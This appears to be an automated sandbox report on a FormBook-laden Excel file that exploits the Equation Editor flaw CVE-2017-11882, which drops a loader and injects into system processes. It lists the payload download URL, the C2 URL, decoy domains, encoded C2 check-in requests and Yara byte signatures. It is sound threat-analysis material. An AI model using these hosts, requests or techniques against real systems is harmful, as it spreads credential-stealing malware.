
Windows Analysis Report: Swift-Payment_Details.xlsx

Overview

General Information

Sample Name: Swift-Payment_Details.xlsx
Analysis ID: 452647
MD5: 975a4017075c97740e54740fc8d24f77
SHA1: 0a483229a6fa9a61575bcdd3068a5707d17034c5
SHA256: 01d8b4b3103b1ecee2ced7a9437bc2c512918199ed9238040b775ee7196e8ede
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2480 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2392 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3016 cmdline: 'C:\Users\Public\vbc.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • vbc.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wscript.exe (PID: 1796 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
            • cmd.exe (PID: 2656 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.vbc.exe.270000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.vbc.exe.270000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.270000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
7.1.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.1.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 further unpacked PE entries not shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.210.173.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3016
Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3016

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Swift-Payment_Details.xlsx, ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match, File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: 9.2.wscript.exe.2ac7960.7.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.wscript.exe.642310.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.vbc.exe.230000.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.1.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.vbc.exe.270000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb, source: vbc.exe, wscript.exe
Source: Binary string: wscript.pdb, source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
Source: Binary string: wscript.pdbN, source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop esi
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then pop ebx
Source: global traffic, DNS query: name: www.anthonysavillemiddleschool.com
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
Source: excel.exe, Memory has grown: Private usage: 4MB later: 71MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.extinctionbrews.com/dy8g/
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK, Date: Thu, 22 Jul 2021 15:23:19 GMT, Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28, Last-Modified: Thu, 22 Jul 2021 14:21:45 GMT, ETag: "2e1d9-5c7b701c11d26", Accept-Ranges: bytes, Content-Length: 188889, Keep-Alive: timeout=5, max=100, Connection: Keep-Alive, Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1, Host: www.anthonysavillemiddleschool.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1, Host: www.envisionfordheights.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1, Host: www.melodezu.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1, Host: www.scuolatua.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1, Host: www.theshapecreator.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 192.210.173.40
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
Source: global traffic, HTTP traffic detected: GET /files/loader1.exe HTTP/1.1, Accept: */*, Accept-Encoding: gzip, deflate, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), Host: 192.210.173.40, Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2ACE7B2.emf
Source: global traffic, HTTP traffic detected: GET /files/loader1.exe HTTP/1.1, Accept: */*, Accept-Encoding: gzip, deflate, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), Host: 192.210.173.40, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1, Host: www.anthonysavillemiddleschool.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1, Host: www.envisionfordheights.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1, Host: www.melodezu.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1, Host: www.scuolatua.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1, Host: www.theshapecreator.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown, DNS traffic detected: queries for: www.anthonysavillemiddleschool.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Thu, 22 Jul 2021 15:24:48 GMT, Server: Apache/2.4.18 (Ubuntu), Content-Length: 278, Connection: close, Content-Type: text/html; charset=iso-8859-1, Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp, String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmp, String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
